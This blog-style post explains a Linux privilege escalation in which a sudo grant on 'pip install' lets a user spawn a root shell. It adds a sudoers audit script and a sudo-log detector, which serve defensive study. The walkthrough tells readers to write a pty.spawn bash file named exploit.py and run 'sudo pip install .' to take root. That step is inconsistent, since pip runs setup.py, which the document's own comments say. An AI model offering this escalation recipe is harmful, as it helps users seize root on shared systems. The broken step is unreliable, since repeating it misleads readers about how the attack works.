Hi All,
Today I am writing about a small mistake that system admins might make when configuring their Linux systems.
As usual, after the admin configures the system they grant the user the privilege to run certain commands as root, which we call sudo. But sometimes the admin is not careful: to stop the user from bugging them too much, they simply enable whatever the user asks for without any security risk analysis.
There are a lot of sudo grants that cannot safely be given to a user, because with that command the user can escalate to a level that endangers the system.
Below is one of the commands that is dangerous to give to a user through sudo:
(root) /usr/bin/pip install *
The above command is the installation manager for Python packages; admins usually grant it so that developer users can install the additional Python packages they need. So what is the deal? With that grant, the user can run sudo pip install on a package they wrote themselves and escalate privileges, because pip executes the package's install script as root.
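The rule above is one instance of a general pattern: any sudo grant on a binary that executes caller-controlled code, or on a command line with a wildcard argument, is effectively a root grant. The following audit script is an added example (not the original post's code) that scans sudoers-style rules for exactly those two properties. The sample sudoers text is constructed for the example; the list of code-running binaries is a starting point, not an exhaustive one.

```python
"""Static audit of sudoers-style rules for grants that let a user run arbitrary
code as the run-as user. Added example, not the original post's code."""
import os
import re
import shlex

# Binaries that execute caller-controlled code when run, so a sudo grant on them is
# effectively a grant of a root shell. pip is here because "pip install <directory>"
# runs that directory's install script (setup.py) as the installing user.
CODE_RUNNING_BINARIES = {
    "pip", "pip2", "pip3", "python", "python2", "python3", "perl", "ruby",
    "node", "sh", "bash", "zsh", "env", "find", "awk", "vi", "vim", "less", "more",
}

# Grammar handled: user  host = (runas) [TAG:]... command[, command]...
# Aliases, Defaults and include directives are out of scope for this example.
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def assess_command(cmd, runas="root"):
    """Return the reasons this single command spec is risky (empty list if none)."""
    cmd = cmd.strip()
    if cmd == "ALL":
        return [f"ALL: any command as {runas}"]
    parts = shlex.split(cmd)
    binary = os.path.basename(parts[0])
    args = parts[1:]
    findings = []
    if binary in CODE_RUNNING_BINARIES:
        findings.append(f"{binary} runs arbitrary code as {runas}")
    if not args:
        # sudoers semantics: a command listed without arguments permits ANY arguments
        findings.append("no arguments pinned: caller may supply any arguments")
    elif any(ch in a for a in args for ch in "*?["):
        findings.append("wildcard argument: caller chooses what it expands to")
    return findings


def audit_sudoers(text):
    """Parse sudoers-style text and return one record per risky command grant."""
    report = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = (m.group("runas") or "root").split(":")[0]
        for cmd in m.group("cmds").split(","):
            findings = assess_command(cmd, runas)
            if findings:
                report.append({"who": m.group("who"), "cmd": cmd.strip(),
                               "findings": findings})
    return report


# Constructed sample sudoers content for the example (not from any real host).
SAMPLE_SUDOERS = """
# User privilege specification
Defaults env_reset
root ALL=(ALL:ALL) ALL
dev ALL=(root) /usr/bin/pip install *
ops ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx, /usr/bin/systemctl status nginx
backup ALL=(root) /usr/bin/rsync -a /srv/data/ /mnt/backup/
dev2 ALL=(root) /usr/bin/pip
"""

if __name__ == "__main__":
    for entry in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{entry['who']:>8}  {entry['cmd']}")
        for reason in entry["findings"]:
            print(f"          - {reason}")
```

Run it against the output of sudo -l or a copy of /etc/sudoers and /etc/sudoers.d/*. The fully pinned systemctl and rsync lines pass; the two pip grants are flagged whether or not the wildcard is present, because pinning the arguments does not stop pip from running a package's install code as root. The fix that removes the risk is not a tighter pattern but a per-user virtualenv the developer owns, so no sudo grant on pip is needed at all.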
Let's do the exploitation. Create a Python script called exploit.py in a directory, just like the script below:
import pty
pty.spawn("/bin/bash")  # spawn an interactive shell
and save it.
After that you can run this command in the directory:
sudo pip install .
The pip install will execute the exploit.py and run the command in the file, which spawns a shell.
Since the script runs with root privileges, the shell that was just spawned is in the root context.
So .. now you have escalated to root.
Easy, right..
This kind of mistake is just very ridiculous … usually made by a lazy admin .. 🙂
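From the defender's side, the same action leaves a clear trace: every sudo invocation is logged with the invoking user, the working directory and the exact command line. The following detector is an added example (not the original post's code) that parses those log lines and flags pip installs whose target is a caller-controlled path rather than a package name. The auth.log lines are constructed for the example; the sudo log format they imitate is the standard one written via syslog.

```python
"""Detect root-context pip installs from caller-controlled paths in sudo log lines.
Added example, not the original post's code."""
import os
import re
import shlex

# Matches the standard sudo syslog line:
#   sudo:   user : TTY=pts/0 ; PWD=/dir ; USER=root ; COMMAND=/usr/bin/...
SUDO_LOG_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+(?:TTY=(?P<tty>\S+)\s+;\s+)?"
    r"PWD=(?P<pwd>[^;]+?)\s+;\s+USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<command>.*)$"
)


def parse_sudo_event(line):
    """Return the fields of a sudo command log line, or None for other lines."""
    m = SUDO_LOG_RE.search(line)
    return m.groupdict() if m else None


def is_local_path_install(command):
    """True if the command is a pip install whose source is a local path or an
    editable install, i.e. install code the invoking user wrote themselves."""
    parts = shlex.split(command)
    if not parts or not os.path.basename(parts[0]).startswith("pip"):
        return False
    if "install" not in parts[1:]:
        return False
    args = parts[parts.index("install") + 1:]
    for a in args:
        if a in (".", "..", "-e", "--editable"):
            return True
        if a.startswith(("/", "./", "../", "file:")):
            return True
        if a.endswith((".tar.gz", ".zip", ".whl")):
            return True
    return False


def flag_risky_pip_installs(log_text):
    """Return the sudo events in log_text that ran pip as root on a local path."""
    flagged = []
    for line in log_text.splitlines():
        event = parse_sudo_event(line)
        if event and event["runas"] == "root" and is_local_path_install(event["command"]):
            flagged.append(event)
    return flagged


# Constructed auth.log excerpt for the example (hostnames and users are invented).
SAMPLE_AUTH_LOG = """\
Jan 10 09:12:44 web01 sudo:      ops : TTY=pts/1 ; PWD=/home/ops ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx
Jan 10 09:15:02 web01 sudo:      dev : TTY=pts/0 ; PWD=/home/dev/exploit ; USER=root ; COMMAND=/usr/bin/pip install .
Jan 10 09:15:03 web01 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by dev(uid=1001)
Jan 10 09:16:10 web01 sudo:      dev : TTY=pts/0 ; PWD=/home/dev ; USER=root ; COMMAND=/usr/bin/pip install requests==2.31.0
Jan 10 09:20:30 web01 sudo:      dev : TTY=pts/0 ; PWD=/home/dev ; USER=root ; COMMAND=/usr/bin/pip install -e /home/dev/tool
"""

if __name__ == "__main__":
    for ev in flag_risky_pip_installs(SAMPLE_AUTH_LOG):
        print(f"ALERT user={ev['user']} pwd={ev['pwd']} command={ev['command']}")
```

The local-path heuristic catches the case the post describes (pip install . from the user's own directory) and the editable form. It deliberately does not alert on a plain PyPI name, but note that any source distribution also runs its setup.py as root when installed this way, so the alert is a symptom; the sudo rule itself is the finding.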